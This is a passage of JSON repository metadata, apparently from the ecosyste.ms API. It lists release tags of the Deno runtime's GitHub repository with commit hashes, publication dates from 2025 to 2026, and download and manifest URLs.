d":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"